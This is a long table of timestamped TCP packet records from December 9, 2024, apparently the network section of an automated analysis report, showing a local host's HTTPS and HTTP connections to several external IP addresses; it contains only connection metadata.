                                                  Dec 9, 2024 09:35:07.937010050 CET44349776172.67.139.11192.168.2.4
                                                  Dec 9, 2024 09:35:07.937069893 CET49776443192.168.2.4172.67.139.11
                                                  Dec 9, 2024 09:35:07.937406063 CET49776443192.168.2.4172.67.139.11
                                                  Dec 9, 2024 09:35:07.937417030 CET49776443192.168.2.4172.67.139.11
                                                  Dec 9, 2024 09:35:07.937454939 CET44349776172.67.139.11192.168.2.4
                                                  Dec 9, 2024 09:35:07.937468052 CET49776443192.168.2.4172.67.139.11
                                                  Dec 9, 2024 09:35:07.937508106 CET49776443192.168.2.4172.67.139.11
                                                  Dec 9, 2024 09:35:07.937791109 CET49777443192.168.2.4172.67.139.11
                                                  Dec 9, 2024 09:35:07.937835932 CET44349777172.67.139.11192.168.2.4
                                                  Dec 9, 2024 09:35:07.937897921 CET49777443192.168.2.4172.67.139.11
                                                  Dec 9, 2024 09:35:07.938093901 CET49777443192.168.2.4172.67.139.11
                                                  Dec 9, 2024 09:35:07.938113928 CET44349777172.67.139.11192.168.2.4
                                                  Dec 9, 2024 09:35:07.969279051 CET44349775104.18.95.41192.168.2.4
                                                  Dec 9, 2024 09:35:07.969333887 CET44349775104.18.95.41192.168.2.4
                                                  Dec 9, 2024 09:35:07.969417095 CET49775443192.168.2.4104.18.95.41
                                                  Dec 9, 2024 09:35:07.970196962 CET49775443192.168.2.4104.18.95.41
                                                  Dec 9, 2024 09:35:07.970212936 CET44349775104.18.95.41192.168.2.4
                                                  Dec 9, 2024 09:35:09.152066946 CET44349777172.67.139.11192.168.2.4
                                                  Dec 9, 2024 09:35:09.152477980 CET49777443192.168.2.4172.67.139.11
                                                  Dec 9, 2024 09:35:09.152499914 CET44349777172.67.139.11192.168.2.4
                                                  Dec 9, 2024 09:35:09.153362989 CET44349777172.67.139.11192.168.2.4
                                                  Dec 9, 2024 09:35:09.153434038 CET49777443192.168.2.4172.67.139.11
                                                  Dec 9, 2024 09:35:09.154596090 CET49777443192.168.2.4172.67.139.11
                                                  Dec 9, 2024 09:35:09.154644012 CET44349777172.67.139.11192.168.2.4
                                                  Dec 9, 2024 09:35:09.154855967 CET49777443192.168.2.4172.67.139.11
                                                  Dec 9, 2024 09:35:09.154864073 CET44349777172.67.139.11192.168.2.4
                                                  Dec 9, 2024 09:35:09.201613903 CET49777443192.168.2.4172.67.139.11
                                                  Dec 9, 2024 09:35:10.003520012 CET44349777172.67.139.11192.168.2.4
                                                  Dec 9, 2024 09:35:10.003614902 CET44349777172.67.139.11192.168.2.4
                                                  Dec 9, 2024 09:35:10.003662109 CET49777443192.168.2.4172.67.139.11
                                                  Dec 9, 2024 09:35:10.005259037 CET49777443192.168.2.4172.67.139.11
                                                  Dec 9, 2024 09:35:10.005274057 CET44349777172.67.139.11192.168.2.4
                                                  Dec 9, 2024 09:35:10.193141937 CET49780443192.168.2.4104.21.32.251
                                                  Dec 9, 2024 09:35:10.193170071 CET44349780104.21.32.251192.168.2.4
                                                  Dec 9, 2024 09:35:10.193233013 CET49780443192.168.2.4104.21.32.251
                                                  Dec 9, 2024 09:35:10.193451881 CET49780443192.168.2.4104.21.32.251
                                                  Dec 9, 2024 09:35:10.193464994 CET44349780104.21.32.251192.168.2.4
                                                  Dec 9, 2024 09:35:11.401302099 CET44349780104.21.32.251192.168.2.4
                                                  Dec 9, 2024 09:35:11.402208090 CET49780443192.168.2.4104.21.32.251
                                                  Dec 9, 2024 09:35:11.402225971 CET44349780104.21.32.251192.168.2.4
                                                  Dec 9, 2024 09:35:11.403105021 CET44349780104.21.32.251192.168.2.4
                                                  Dec 9, 2024 09:35:11.403166056 CET49780443192.168.2.4104.21.32.251
                                                  Dec 9, 2024 09:35:11.403448105 CET49780443192.168.2.4104.21.32.251
                                                  Dec 9, 2024 09:35:11.403458118 CET49780443192.168.2.4104.21.32.251
                                                  Dec 9, 2024 09:35:11.403502941 CET44349780104.21.32.251192.168.2.4
                                                  Dec 9, 2024 09:35:11.403512955 CET49780443192.168.2.4104.21.32.251
                                                  Dec 9, 2024 09:35:11.403557062 CET49780443192.168.2.4104.21.32.251
                                                  Dec 9, 2024 09:35:11.403915882 CET49781443192.168.2.4104.21.32.251
                                                  Dec 9, 2024 09:35:11.403953075 CET44349781104.21.32.251192.168.2.4
                                                  Dec 9, 2024 09:35:11.408726931 CET49781443192.168.2.4104.21.32.251
                                                  Dec 9, 2024 09:35:11.408919096 CET49781443192.168.2.4104.21.32.251
                                                  Dec 9, 2024 09:35:11.408931971 CET44349781104.21.32.251192.168.2.4
                                                  Dec 9, 2024 09:35:12.618000984 CET44349781104.21.32.251192.168.2.4
                                                  Dec 9, 2024 09:35:12.618278027 CET49781443192.168.2.4104.21.32.251
                                                  Dec 9, 2024 09:35:12.618294001 CET44349781104.21.32.251192.168.2.4
                                                  Dec 9, 2024 09:35:12.619168043 CET44349781104.21.32.251192.168.2.4
                                                  Dec 9, 2024 09:35:12.619224072 CET49781443192.168.2.4104.21.32.251
                                                  Dec 9, 2024 09:35:12.619544983 CET49781443192.168.2.4104.21.32.251
                                                  Dec 9, 2024 09:35:12.619596004 CET44349781104.21.32.251192.168.2.4
                                                  Dec 9, 2024 09:35:12.619703054 CET49781443192.168.2.4104.21.32.251
                                                  Dec 9, 2024 09:35:12.619708061 CET44349781104.21.32.251192.168.2.4
                                                  Dec 9, 2024 09:35:12.671817064 CET49781443192.168.2.4104.21.32.251
                                                  Dec 9, 2024 09:35:13.483119965 CET44349781104.21.32.251192.168.2.4
                                                  Dec 9, 2024 09:35:13.483223915 CET44349781104.21.32.251192.168.2.4
                                                  Dec 9, 2024 09:35:13.483302116 CET49781443192.168.2.4104.21.32.251
                                                  Dec 9, 2024 09:35:13.484817982 CET49781443192.168.2.4104.21.32.251
                                                  Dec 9, 2024 09:35:13.484833956 CET44349781104.21.32.251192.168.2.4
                                                  Dec 9, 2024 09:35:17.238069057 CET4974080192.168.2.493.188.41.36
                                                  Dec 9, 2024 09:35:17.357631922 CET804974093.188.41.36192.168.2.4
                                                  Dec 9, 2024 09:35:17.744235992 CET49786443192.168.2.413.107.246.63
                                                  Dec 9, 2024 09:35:17.744272947 CET4434978613.107.246.63192.168.2.4
                                                  Dec 9, 2024 09:35:17.744333029 CET49786443192.168.2.413.107.246.63
                                                  Dec 9, 2024 09:35:17.744545937 CET49786443192.168.2.413.107.246.63
                                                  Dec 9, 2024 09:35:17.744560957 CET4434978613.107.246.63192.168.2.4
                                                  Dec 9, 2024 09:35:19.465003967 CET4434978613.107.246.63192.168.2.4
                                                  Dec 9, 2024 09:35:19.465253115 CET49786443192.168.2.413.107.246.63
                                                  Dec 9, 2024 09:35:19.465265989 CET4434978613.107.246.63192.168.2.4
                                                  Dec 9, 2024 09:35:19.466240883 CET4434978613.107.246.63192.168.2.4
                                                  Dec 9, 2024 09:35:19.466309071 CET49786443192.168.2.413.107.246.63
                                                  Dec 9, 2024 09:35:19.467231989 CET49786443192.168.2.413.107.246.63
                                                  Dec 9, 2024 09:35:19.467288971 CET4434978613.107.246.63192.168.2.4
                                                  Dec 9, 2024 09:35:19.467408895 CET49786443192.168.2.413.107.246.63
                                                  Dec 9, 2024 09:35:19.467415094 CET4434978613.107.246.63192.168.2.4
                                                  Dec 9, 2024 09:35:19.514607906 CET49786443192.168.2.413.107.246.63
                                                  Dec 9, 2024 09:35:20.408442974 CET4434978613.107.246.63192.168.2.4
                                                  Dec 9, 2024 09:35:20.408463955 CET4434978613.107.246.63192.168.2.4
                                                  Dec 9, 2024 09:35:20.408472061 CET4434978613.107.246.63192.168.2.4
                                                  Dec 9, 2024 09:35:20.408495903 CET4434978613.107.246.63192.168.2.4
                                                  Dec 9, 2024 09:35:20.408528090 CET4434978613.107.246.63192.168.2.4
                                                  Dec 9, 2024 09:35:20.408528090 CET49786443192.168.2.413.107.246.63
                                                  Dec 9, 2024 09:35:20.408551931 CET4434978613.107.246.63192.168.2.4
                                                  Dec 9, 2024 09:35:20.408566952 CET49786443192.168.2.413.107.246.63
                                                  Dec 9, 2024 09:35:20.408577919 CET49786443192.168.2.413.107.246.63
                                                  Dec 9, 2024 09:35:20.408607006 CET49786443192.168.2.413.107.246.63
                                                  Dec 9, 2024 09:35:20.573472977 CET49791443192.168.2.420.109.210.53
                                                  Dec 9, 2024 09:35:20.573498011 CET4434979120.109.210.53192.168.2.4
                                                  Dec 9, 2024 09:35:20.573575974 CET49791443192.168.2.420.109.210.53
                                                  Dec 9, 2024 09:35:20.573884010 CET49791443192.168.2.420.109.210.53
                                                  Dec 9, 2024 09:35:20.573898077 CET4434979120.109.210.53192.168.2.4
                                                  Dec 9, 2024 09:35:20.587471008 CET4434978613.107.246.63192.168.2.4
                                                  Dec 9, 2024 09:35:20.587492943 CET4434978613.107.246.63192.168.2.4
                                                  Dec 9, 2024 09:35:20.587567091 CET49786443192.168.2.413.107.246.63
                                                  Dec 9, 2024 09:35:20.587589979 CET4434978613.107.246.63192.168.2.4
                                                  Dec 9, 2024 09:35:20.587634087 CET49786443192.168.2.413.107.246.63
                                                  Dec 9, 2024 09:35:20.640607119 CET4434978613.107.246.63192.168.2.4
                                                  Dec 9, 2024 09:35:20.640621901 CET4434978613.107.246.63192.168.2.4
                                                  Dec 9, 2024 09:35:20.640680075 CET49786443192.168.2.413.107.246.63
                                                  Dec 9, 2024 09:35:20.640688896 CET4434978613.107.246.63192.168.2.4
                                                  Dec 9, 2024 09:35:20.640749931 CET49786443192.168.2.413.107.246.63
                                                  Dec 9, 2024 09:35:20.683254957 CET49794443192.168.2.413.107.246.63
                                                  Dec 9, 2024 09:35:20.683275938 CET4434979413.107.246.63192.168.2.4
                                                  Dec 9, 2024 09:35:20.683353901 CET49794443192.168.2.413.107.246.63
                                                  Dec 9, 2024 09:35:20.683693886 CET49794443192.168.2.413.107.246.63
                                                  Dec 9, 2024 09:35:20.683703899 CET4434979413.107.246.63192.168.2.4
                                                  Dec 9, 2024 09:35:20.756779909 CET4434978613.107.246.63192.168.2.4
                                                  Dec 9, 2024 09:35:20.756803989 CET4434978613.107.246.63192.168.2.4
                                                  Dec 9, 2024 09:35:20.756953001 CET49786443192.168.2.413.107.246.63
                                                  Dec 9, 2024 09:35:20.756961107 CET4434978613.107.246.63192.168.2.4
                                                  Dec 9, 2024 09:35:20.757009029 CET49786443192.168.2.413.107.246.63
                                                  Dec 9, 2024 09:35:20.790958881 CET4434978613.107.246.63192.168.2.4
                                                  Dec 9, 2024 09:35:20.790975094 CET4434978613.107.246.63192.168.2.4
                                                  Dec 9, 2024 09:35:20.791052103 CET49786443192.168.2.413.107.246.63
                                                  Dec 9, 2024 09:35:20.791063070 CET4434978613.107.246.63192.168.2.4
                                                  Dec 9, 2024 09:35:20.791105032 CET49786443192.168.2.413.107.246.63
                                                  Dec 9, 2024 09:35:20.817198038 CET4434978613.107.246.63192.168.2.4
                                                  Dec 9, 2024 09:35:20.817213058 CET4434978613.107.246.63192.168.2.4
                                                  Dec 9, 2024 09:35:20.817295074 CET49786443192.168.2.413.107.246.63
                                                  Dec 9, 2024 09:35:20.817301989 CET4434978613.107.246.63192.168.2.4
                                                  Dec 9, 2024 09:35:20.817353010 CET49786443192.168.2.413.107.246.63
                                                  Dec 9, 2024 09:35:20.836086988 CET4434978613.107.246.63192.168.2.4
                                                  Dec 9, 2024 09:35:20.836101055 CET4434978613.107.246.63192.168.2.4
                                                  Dec 9, 2024 09:35:20.836148024 CET49786443192.168.2.413.107.246.63
                                                  Dec 9, 2024 09:35:20.836154938 CET4434978613.107.246.63192.168.2.4
                                                  Dec 9, 2024 09:35:20.836193085 CET49786443192.168.2.413.107.246.63
                                                  Dec 9, 2024 09:35:20.836205006 CET49786443192.168.2.413.107.246.63
                                                  Dec 9, 2024 09:35:20.950835943 CET4434978613.107.246.63192.168.2.4
                                                  Dec 9, 2024 09:35:20.950860023 CET4434978613.107.246.63192.168.2.4
                                                  Dec 9, 2024 09:35:20.950903893 CET49786443192.168.2.413.107.246.63
                                                  Dec 9, 2024 09:35:20.950911045 CET4434978613.107.246.63192.168.2.4
                                                  Dec 9, 2024 09:35:20.950948954 CET49786443192.168.2.413.107.246.63
                                                  Dec 9, 2024 09:35:20.950962067 CET49786443192.168.2.413.107.246.63
                                                  Dec 9, 2024 09:35:20.961237907 CET4434978613.107.246.63192.168.2.4
                                                  Dec 9, 2024 09:35:20.961280107 CET4434978613.107.246.63192.168.2.4
                                                  Dec 9, 2024 09:35:20.961297035 CET4434978613.107.246.63192.168.2.4
                                                  Dec 9, 2024 09:35:20.961297989 CET49786443192.168.2.413.107.246.63
                                                  Dec 9, 2024 09:35:20.961344004 CET49786443192.168.2.413.107.246.63
                                                  Dec 9, 2024 09:35:20.961663008 CET49786443192.168.2.413.107.246.63
                                                  Dec 9, 2024 09:35:20.961672068 CET4434978613.107.246.63192.168.2.4
                                                  Dec 9, 2024 09:35:21.105756044 CET49795443192.168.2.413.107.246.63
                                                  Dec 9, 2024 09:35:21.105794907 CET4434979513.107.246.63192.168.2.4
                                                  Dec 9, 2024 09:35:21.105856895 CET49795443192.168.2.413.107.246.63
                                                  Dec 9, 2024 09:35:21.106084108 CET49795443192.168.2.413.107.246.63
                                                  Dec 9, 2024 09:35:21.106097937 CET4434979513.107.246.63192.168.2.4
                                                  Dec 9, 2024 09:35:22.209904909 CET4434979120.109.210.53192.168.2.4
                                                  Dec 9, 2024 09:35:22.209980011 CET49791443192.168.2.420.109.210.53
                                                  Dec 9, 2024 09:35:22.214431047 CET49791443192.168.2.420.109.210.53
                                                  Dec 9, 2024 09:35:22.214440107 CET4434979120.109.210.53192.168.2.4
                                                  Dec 9, 2024 09:35:22.214680910 CET4434979120.109.210.53192.168.2.4
                                                  Dec 9, 2024 09:35:22.226164103 CET49791443192.168.2.420.109.210.53
                                                  Dec 9, 2024 09:35:22.267339945 CET4434979120.109.210.53192.168.2.4
                                                  Dec 9, 2024 09:35:22.405864954 CET4434979413.107.246.63192.168.2.4
                                                  Dec 9, 2024 09:35:22.406001091 CET49794443192.168.2.413.107.246.63
                                                  Dec 9, 2024 09:35:22.407608986 CET49794443192.168.2.413.107.246.63
                                                  Dec 9, 2024 09:35:22.407624006 CET4434979413.107.246.63192.168.2.4
                                                  Dec 9, 2024 09:35:22.407831907 CET4434979413.107.246.63192.168.2.4
                                                  Dec 9, 2024 09:35:22.417071104 CET49794443192.168.2.413.107.246.63
                                                  Dec 9, 2024 09:35:22.463335037 CET4434979413.107.246.63192.168.2.4
                                                  Dec 9, 2024 09:35:22.820242882 CET4434979513.107.246.63192.168.2.4
                                                  Dec 9, 2024 09:35:22.820518970 CET49795443192.168.2.413.107.246.63
                                                  Dec 9, 2024 09:35:22.820570946 CET4434979513.107.246.63192.168.2.4
                                                  Dec 9, 2024 09:35:22.821564913 CET4434979513.107.246.63192.168.2.4
                                                  Dec 9, 2024 09:35:22.821628094 CET49795443192.168.2.413.107.246.63
                                                  Dec 9, 2024 09:35:22.821952105 CET49795443192.168.2.413.107.246.63
                                                  Dec 9, 2024 09:35:22.822016001 CET4434979513.107.246.63192.168.2.4
                                                  Dec 9, 2024 09:35:22.822055101 CET49795443192.168.2.413.107.246.63
                                                  Dec 9, 2024 09:35:22.863327026 CET4434979513.107.246.63192.168.2.4
                                                  Dec 9, 2024 09:35:22.871206999 CET4434979120.109.210.53192.168.2.4
                                                  Dec 9, 2024 09:35:22.871226072 CET4434979120.109.210.53192.168.2.4
                                                  Dec 9, 2024 09:35:22.871253967 CET4434979120.109.210.53192.168.2.4
                                                  Dec 9, 2024 09:35:22.871325016 CET49791443192.168.2.420.109.210.53
                                                  Dec 9, 2024 09:35:22.871344090 CET4434979120.109.210.53192.168.2.4
                                                  Dec 9, 2024 09:35:22.871356964 CET49791443192.168.2.420.109.210.53
                                                  Dec 9, 2024 09:35:22.871393919 CET49791443192.168.2.420.109.210.53
                                                  Dec 9, 2024 09:35:22.872956991 CET49795443192.168.2.413.107.246.63
                                                  Dec 9, 2024 09:35:22.872962952 CET4434979513.107.246.63192.168.2.4
                                                  Dec 9, 2024 09:35:22.883876085 CET4434979413.107.246.63192.168.2.4
                                                  Dec 9, 2024 09:35:22.883898973 CET4434979413.107.246.63192.168.2.4
                                                  Dec 9, 2024 09:35:22.883913994 CET4434979413.107.246.63192.168.2.4
                                                  Dec 9, 2024 09:35:22.884008884 CET49794443192.168.2.413.107.246.63
                                                  Dec 9, 2024 09:35:22.884022951 CET4434979413.107.246.63192.168.2.4
                                                  Dec 9, 2024 09:35:22.884073019 CET49794443192.168.2.413.107.246.63
                                                  Dec 9, 2024 09:35:22.911417007 CET4434979120.109.210.53192.168.2.4
                                                  Dec 9, 2024 09:35:22.911452055 CET4434979120.109.210.53192.168.2.4
                                                  Dec 9, 2024 09:35:22.911487103 CET49791443192.168.2.420.109.210.53
                                                  Dec 9, 2024 09:35:22.911499023 CET4434979120.109.210.53192.168.2.4
                                                  Dec 9, 2024 09:35:22.911510944 CET4434979120.109.210.53192.168.2.4
                                                  Dec 9, 2024 09:35:22.911530018 CET49791443192.168.2.420.109.210.53
                                                  Dec 9, 2024 09:35:22.911570072 CET49791443192.168.2.420.109.210.53
                                                  Dec 9, 2024 09:35:22.911809921 CET49791443192.168.2.420.109.210.53
                                                  Dec 9, 2024 09:35:22.911825895 CET4434979120.109.210.53192.168.2.4
                                                  Dec 9, 2024 09:35:22.911837101 CET49791443192.168.2.420.109.210.53
                                                  Dec 9, 2024 09:35:22.911843061 CET4434979120.109.210.53192.168.2.4
                                                  Dec 9, 2024 09:35:22.913928032 CET49795443192.168.2.413.107.246.63
                                                  Dec 9, 2024 09:35:23.062556982 CET4434979413.107.246.63192.168.2.4
                                                  Dec 9, 2024 09:35:23.062578917 CET4434979413.107.246.63192.168.2.4
                                                  Dec 9, 2024 09:35:23.062632084 CET49794443192.168.2.413.107.246.63
                                                  Dec 9, 2024 09:35:23.062647104 CET4434979413.107.246.63192.168.2.4
                                                  Dec 9, 2024 09:35:23.062673092 CET49794443192.168.2.413.107.246.63
                                                  Dec 9, 2024 09:35:23.062700987 CET49794443192.168.2.413.107.246.63
                                                  Dec 9, 2024 09:35:23.106499910 CET4434979413.107.246.63192.168.2.4
                                                  Dec 9, 2024 09:35:23.106520891 CET4434979413.107.246.63192.168.2.4
                                                  Dec 9, 2024 09:35:23.106591940 CET49794443192.168.2.413.107.246.63
                                                  Dec 9, 2024 09:35:23.106612921 CET4434979413.107.246.63192.168.2.4
                                                  Dec 9, 2024 09:35:23.106659889 CET49794443192.168.2.413.107.246.63
                                                  Dec 9, 2024 09:35:23.236481905 CET4434979413.107.246.63192.168.2.4
                                                  Dec 9, 2024 09:35:23.236499071 CET4434979413.107.246.63192.168.2.4
                                                  Dec 9, 2024 09:35:23.236567974 CET49794443192.168.2.413.107.246.63
                                                  Dec 9, 2024 09:35:23.236587048 CET4434979413.107.246.63192.168.2.4
                                                  Dec 9, 2024 09:35:23.236603975 CET49794443192.168.2.413.107.246.63
                                                  Dec 9, 2024 09:35:23.236629963 CET49794443192.168.2.413.107.246.63
                                                  Dec 9, 2024 09:35:23.274756908 CET4434979413.107.246.63192.168.2.4
                                                  Dec 9, 2024 09:35:23.274780035 CET4434979413.107.246.63192.168.2.4
                                                  Dec 9, 2024 09:35:23.274833918 CET49794443192.168.2.413.107.246.63
                                                  Dec 9, 2024 09:35:23.274842024 CET4434979413.107.246.63192.168.2.4
                                                  Dec 9, 2024 09:35:23.274873018 CET49794443192.168.2.413.107.246.63
                                                  Dec 9, 2024 09:35:23.274897099 CET49794443192.168.2.413.107.246.63
                                                  Dec 9, 2024 09:35:23.295783043 CET4434979413.107.246.63192.168.2.4
                                                  Dec 9, 2024 09:35:23.295804024 CET4434979413.107.246.63192.168.2.4
                                                  Dec 9, 2024 09:35:23.295883894 CET49794443192.168.2.413.107.246.63
                                                  Dec 9, 2024 09:35:23.295890093 CET4434979413.107.246.63192.168.2.4
                                                  Dec 9, 2024 09:35:23.295932055 CET49794443192.168.2.413.107.246.63
                                                  Dec 9, 2024 09:35:23.295942068 CET49794443192.168.2.413.107.246.63
                                                  Dec 9, 2024 09:35:23.301039934 CET4434979513.107.246.63192.168.2.4
                                                  Dec 9, 2024 09:35:23.301060915 CET4434979513.107.246.63192.168.2.4
                                                  Dec 9, 2024 09:35:23.301068068 CET4434979513.107.246.63192.168.2.4
                                                  Dec 9, 2024 09:35:23.301090002 CET4434979513.107.246.63192.168.2.4
                                                  Dec 9, 2024 09:35:23.301098108 CET4434979513.107.246.63192.168.2.4
                                                  Dec 9, 2024 09:35:23.301109076 CET4434979513.107.246.63192.168.2.4
                                                  Dec 9, 2024 09:35:23.301125050 CET49795443192.168.2.413.107.246.63
                                                  Dec 9, 2024 09:35:23.301137924 CET4434979513.107.246.63192.168.2.4
                                                  Dec 9, 2024 09:35:23.301165104 CET49795443192.168.2.413.107.246.63
                                                  Dec 9, 2024 09:35:23.301179886 CET49795443192.168.2.413.107.246.63
                                                  Dec 9, 2024 09:35:23.313975096 CET4434979413.107.246.63192.168.2.4
                                                  Dec 9, 2024 09:35:23.313993931 CET4434979413.107.246.63192.168.2.4
                                                  Dec 9, 2024 09:35:23.314059973 CET49794443192.168.2.413.107.246.63
                                                  Dec 9, 2024 09:35:23.314069986 CET4434979413.107.246.63192.168.2.4
                                                  Dec 9, 2024 09:35:23.314117908 CET49794443192.168.2.413.107.246.63
                                                  Dec 9, 2024 09:35:23.424644947 CET4434979413.107.246.63192.168.2.4
                                                  Dec 9, 2024 09:35:23.424673080 CET4434979413.107.246.63192.168.2.4
                                                  Dec 9, 2024 09:35:23.424787045 CET49794443192.168.2.413.107.246.63
                                                  Dec 9, 2024 09:35:23.424803019 CET4434979413.107.246.63192.168.2.4
                                                  Dec 9, 2024 09:35:23.424849987 CET49794443192.168.2.413.107.246.63
                                                  Dec 9, 2024 09:35:23.441800117 CET4434979413.107.246.63192.168.2.4
                                                  Dec 9, 2024 09:35:23.441816092 CET4434979413.107.246.63192.168.2.4
                                                  Dec 9, 2024 09:35:23.441919088 CET49794443192.168.2.413.107.246.63
                                                  Dec 9, 2024 09:35:23.441930056 CET4434979413.107.246.63192.168.2.4
                                                  Dec 9, 2024 09:35:23.441973925 CET49794443192.168.2.413.107.246.63
                                                  Dec 9, 2024 09:35:23.455329895 CET4434979413.107.246.63192.168.2.4
                                                  Dec 9, 2024 09:35:23.455346107 CET4434979413.107.246.63192.168.2.4
                                                  Dec 9, 2024 09:35:23.455416918 CET49794443192.168.2.413.107.246.63
                                                  Dec 9, 2024 09:35:23.455425024 CET4434979413.107.246.63192.168.2.4
                                                  Dec 9, 2024 09:35:23.455468893 CET49794443192.168.2.413.107.246.63
                                                  Dec 9, 2024 09:35:23.471021891 CET4434979413.107.246.63192.168.2.4
                                                  Dec 9, 2024 09:35:23.471038103 CET4434979413.107.246.63192.168.2.4
                                                  Dec 9, 2024 09:35:23.471103907 CET49794443192.168.2.413.107.246.63
                                                  Dec 9, 2024 09:35:23.471112013 CET4434979413.107.246.63192.168.2.4
                                                  Dec 9, 2024 09:35:23.471153021 CET49794443192.168.2.413.107.246.63
                                                  Dec 9, 2024 09:35:23.485372066 CET4434979413.107.246.63192.168.2.4
                                                  Dec 9, 2024 09:35:23.485387087 CET4434979413.107.246.63192.168.2.4
                                                  Dec 9, 2024 09:35:23.485456944 CET49794443192.168.2.413.107.246.63
                                                  Dec 9, 2024 09:35:23.485464096 CET4434979413.107.246.63192.168.2.4
                                                  Dec 9, 2024 09:35:23.485510111 CET49794443192.168.2.413.107.246.63
                                                  Dec 9, 2024 09:35:23.485996962 CET4434979513.107.246.63192.168.2.4
                                                  Dec 9, 2024 09:35:23.486006975 CET4434979513.107.246.63192.168.2.4
                                                  Dec 9, 2024 09:35:23.486031055 CET4434979513.107.246.63192.168.2.4
                                                  Dec 9, 2024 09:35:23.486067057 CET49795443192.168.2.413.107.246.63
                                                  Dec 9, 2024 09:35:23.486078024 CET4434979513.107.246.63192.168.2.4
                                                  Dec 9, 2024 09:35:23.486088037 CET49795443192.168.2.413.107.246.63
                                                  Dec 9, 2024 09:35:23.486123085 CET49795443192.168.2.413.107.246.63
                                                  Dec 9, 2024 09:35:23.500897884 CET4434979413.107.246.63192.168.2.4
                                                  Dec 9, 2024 09:35:23.500921965 CET4434979413.107.246.63192.168.2.4
                                                  Dec 9, 2024 09:35:23.501005888 CET49794443192.168.2.413.107.246.63
                                                  Dec 9, 2024 09:35:23.501013994 CET4434979413.107.246.63192.168.2.4
                                                  Dec 9, 2024 09:35:23.501058102 CET49794443192.168.2.413.107.246.63
                                                  Dec 9, 2024 09:35:23.507596970 CET4434979413.107.246.63192.168.2.4
                                                  Dec 9, 2024 09:35:23.507651091 CET4434979413.107.246.63192.168.2.4
                                                  Dec 9, 2024 09:35:23.507671118 CET49794443192.168.2.413.107.246.63
                                                  Dec 9, 2024 09:35:23.507700920 CET49794443192.168.2.413.107.246.63
                                                  Dec 9, 2024 09:35:23.507769108 CET49794443192.168.2.413.107.246.63
                                                  Dec 9, 2024 09:35:23.507782936 CET4434979413.107.246.63192.168.2.4
                                                  Dec 9, 2024 09:35:23.507797003 CET49794443192.168.2.413.107.246.63
                                                  Dec 9, 2024 09:35:23.507802010 CET4434979413.107.246.63192.168.2.4
                                                  Dec 9, 2024 09:35:23.526658058 CET4434979513.107.246.63192.168.2.4
                                                  Dec 9, 2024 09:35:23.526675940 CET4434979513.107.246.63192.168.2.4
                                                  Dec 9, 2024 09:35:23.526756048 CET49795443192.168.2.413.107.246.63
                                                  Dec 9, 2024 09:35:23.526765108 CET4434979513.107.246.63192.168.2.4
                                                  Dec 9, 2024 09:35:23.526814938 CET49795443192.168.2.413.107.246.63
                                                  Dec 9, 2024 09:35:23.551002026 CET49797443192.168.2.413.107.246.63
                                                  Dec 9, 2024 09:35:23.551031113 CET4434979713.107.246.63192.168.2.4
                                                  Dec 9, 2024 09:35:23.551126957 CET49797443192.168.2.413.107.246.63
                                                  Dec 9, 2024 09:35:23.551615000 CET49797443192.168.2.413.107.246.63
                                                  Dec 9, 2024 09:35:23.551625967 CET4434979713.107.246.63192.168.2.4
                                                  Dec 9, 2024 09:35:23.552902937 CET49798443192.168.2.413.107.246.63
                                                  Dec 9, 2024 09:35:23.552941084 CET4434979813.107.246.63192.168.2.4
                                                  Dec 9, 2024 09:35:23.552989006 CET49798443192.168.2.413.107.246.63
                                                  Dec 9, 2024 09:35:23.553311110 CET49798443192.168.2.413.107.246.63
                                                  Dec 9, 2024 09:35:23.553324938 CET4434979813.107.246.63192.168.2.4
                                                  Dec 9, 2024 09:35:23.553565025 CET49799443192.168.2.413.107.246.63
                                                  Dec 9, 2024 09:35:23.553572893 CET4434979913.107.246.63192.168.2.4
                                                  Dec 9, 2024 09:35:23.553634882 CET49799443192.168.2.413.107.246.63
                                                  Dec 9, 2024 09:35:23.553730011 CET49799443192.168.2.413.107.246.63
                                                  Dec 9, 2024 09:35:23.553740978 CET4434979913.107.246.63192.168.2.4
                                                  Dec 9, 2024 09:35:23.555022955 CET49800443192.168.2.413.107.246.63
                                                  Dec 9, 2024 09:35:23.555058002 CET4434980013.107.246.63192.168.2.4
                                                  Dec 9, 2024 09:35:23.555109024 CET49800443192.168.2.413.107.246.63
                                                  Dec 9, 2024 09:35:23.555576086 CET49801443192.168.2.413.107.246.63
                                                  Dec 9, 2024 09:35:23.555613995 CET4434980113.107.246.63192.168.2.4
                                                  Dec 9, 2024 09:35:23.555665970 CET49801443192.168.2.413.107.246.63
                                                  Dec 9, 2024 09:35:23.555695057 CET49800443192.168.2.413.107.246.63
                                                  Dec 9, 2024 09:35:23.555710077 CET4434980013.107.246.63192.168.2.4
                                                  Dec 9, 2024 09:35:23.555783033 CET49801443192.168.2.413.107.246.63
                                                  Dec 9, 2024 09:35:23.555799007 CET4434980113.107.246.63192.168.2.4
                                                  Dec 9, 2024 09:35:23.650666952 CET4434979513.107.246.63192.168.2.4
                                                  Dec 9, 2024 09:35:23.650696039 CET4434979513.107.246.63192.168.2.4
                                                  Dec 9, 2024 09:35:23.650751114 CET49795443192.168.2.413.107.246.63
                                                  Dec 9, 2024 09:35:23.650784016 CET4434979513.107.246.63192.168.2.4
                                                  Dec 9, 2024 09:35:23.650815010 CET49795443192.168.2.413.107.246.63
                                                  Dec 9, 2024 09:35:23.650839090 CET49795443192.168.2.413.107.246.63
                                                  Dec 9, 2024 09:35:23.680298090 CET4434979513.107.246.63192.168.2.4
                                                  Dec 9, 2024 09:35:23.680318117 CET4434979513.107.246.63192.168.2.4
                                                  Dec 9, 2024 09:35:23.680361986 CET49795443192.168.2.413.107.246.63
                                                  Dec 9, 2024 09:35:23.680370092 CET4434979513.107.246.63192.168.2.4
                                                  Dec 9, 2024 09:35:23.680402040 CET49795443192.168.2.413.107.246.63
                                                  Dec 9, 2024 09:35:23.680422068 CET49795443192.168.2.413.107.246.63
                                                  Dec 9, 2024 09:35:23.702631950 CET4434979513.107.246.63192.168.2.4
                                                  Dec 9, 2024 09:35:23.702650070 CET4434979513.107.246.63192.168.2.4
                                                  Dec 9, 2024 09:35:23.702718973 CET49795443192.168.2.413.107.246.63
                                                  Dec 9, 2024 09:35:23.702727079 CET4434979513.107.246.63192.168.2.4
                                                  Dec 9, 2024 09:35:23.702775002 CET49795443192.168.2.413.107.246.63
                                                  Dec 9, 2024 09:35:23.722379923 CET4434979513.107.246.63192.168.2.4
                                                  Dec 9, 2024 09:35:23.722397089 CET4434979513.107.246.63192.168.2.4
                                                  Dec 9, 2024 09:35:23.722467899 CET49795443192.168.2.413.107.246.63
                                                  Dec 9, 2024 09:35:23.722476006 CET4434979513.107.246.63192.168.2.4
